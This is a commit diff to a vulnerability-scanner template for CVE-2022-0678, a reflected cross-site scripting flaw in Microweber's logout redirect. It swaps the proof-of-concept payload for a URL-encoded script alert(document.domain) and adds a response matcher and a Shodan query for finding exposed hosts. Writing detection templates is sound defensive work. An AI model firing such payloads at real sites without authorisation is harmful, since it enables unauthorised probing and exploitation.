Update CVE-2022-0678.yaml

cves/2022/CVE-2022-0678.yaml

@@ -1,32 +1,34 @@
 id: CVE-2022-0678
 
 info:
-  name: Microweber Cross-Site Scripting
+  name: Microweber < 1.2.11- Cross-Site Scripting
   author: tess
   severity: medium
   description: |
-    Can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
+    Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
   reference:
     - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
     - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0678
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0678
+  classification:
+    cve-id: CVE-2022-0678
   metadata:
     verified: true
     shodan-query: http.favicon.hash:780351152
-  tags: xss,microweber
+  tags: cve,cve2022,xss,microweber
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf"><iframe%20onload=alert(document.domain)>'
+      - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '><iframe onload=alert(document.domain)>'
+          - '><script>alert(document.domain)</script>'
+          - 'content="Microweber"'
         condition: and
 
       - type: word